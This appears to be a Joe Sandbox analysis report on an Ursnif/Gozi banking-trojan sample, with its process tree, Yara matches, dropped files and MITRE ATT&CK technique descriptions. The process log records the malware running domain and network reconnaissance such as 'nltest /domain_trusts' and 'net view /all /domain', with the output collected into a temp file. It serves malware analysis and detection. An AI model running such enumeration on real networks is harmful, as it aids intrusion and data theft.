Analysis Process: net1.exePID: 5184, Parent PID: 5880

General

Target ID:	72
Start time:	15:04:55
Start date:	11/10/2022
Path:	C:\Windows\System32\net1.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\net1 config workstation
Imagebase:	0x7ff6f9bc0000
File size:	175104 bytes
MD5 hash:	AF569DE92AB6C1B9C681AF1E799F9983
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4584, Parent PID: 3528

General

Target ID:	73
Start time:	15:04:57
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 400, Parent PID: 4584

General

Target ID:	74
Start time:	15:04:57
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4532, Parent PID: 3528

General

Target ID:	75
Start time:	15:04:58
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 4664, Parent PID: 4532

General

Target ID:	76
Start time:	15:04:58
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6992e0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: nltest.exePID: 5620, Parent PID: 4532

General

Target ID:	77
Start time:	15:04:59
Start date:	11/10/2022
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff631910000
File size:	514048 bytes
MD5 hash:	3198EC1CA24B6CB75D597CEE39D71E58
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 504, Parent PID: 3528

General

Target ID:	78
Start time:	15:05:00
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 3912, Parent PID: 504

General

Target ID:	79
Start time:	15:05:00
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 3736, Parent PID: 3528

General

Target ID:	80
Start time:	15:05:01
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 1172, Parent PID: 3736

General

Target ID:	81
Start time:	15:05:02
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: nltest.exePID: 3852, Parent PID: 3736

General

Target ID:	82
Start time:	15:05:02
Start date:	11/10/2022
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff631910000
File size:	514048 bytes
MD5 hash:	3198EC1CA24B6CB75D597CEE39D71E58
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 3576, Parent PID: 3528

General

Target ID:	83
Start time:	15:05:03
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 5028, Parent PID: 3576

General

Target ID:	84
Start time:	15:05:04
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 2468, Parent PID: 3528

General

Target ID:	85
Start time:	15:05:04
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2472, Parent PID: 2468

General

Target ID:	86
Start time:	15:05:05
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: net.exePID: 5000, Parent PID: 2468

General

Target ID:	87
Start time:	15:05:05
Start date:	11/10/2022
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff65f370000
File size:	56832 bytes
MD5 hash:	15534275EDAABC58159DD0F8607A71E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: csc.exePID: 3536, Parent PID: 6064

General

Target ID:	88
Start time:	15:05:07
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Imagebase:	0x7ff707330000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

Analysis Process: cvtres.exePID: 5240, Parent PID: 3536

General

Target ID:	89
Start time:	15:05:15
Start date:	11/10/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Imagebase:	0x7ff77b170000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

Analysis Process: cmd.exePID: 2800, Parent PID: 3528

General

Target ID:	90
Start time:	15:05:20
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 2500, Parent PID: 2800

General

Target ID:	91
Start time:	15:05:20
Start date:	11/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4108, Parent PID: 3528

General

Target ID:	92
Start time:	15:05:21
Start date:	11/10/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Imagebase:
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Lx6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\7C7B.bin\AuthRoot.pfx

C:\Users\user\AppData\Local\Temp\7C7B.bin\Root.pfx

C:\Users\user\AppData\Local\Temp\9AF9.bin1

C:\Users\user\AppData\Local\Temp\9F2A.bin

C:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP

C:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP

C:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP

C:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP

Windows Analysis Report
Lx6.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre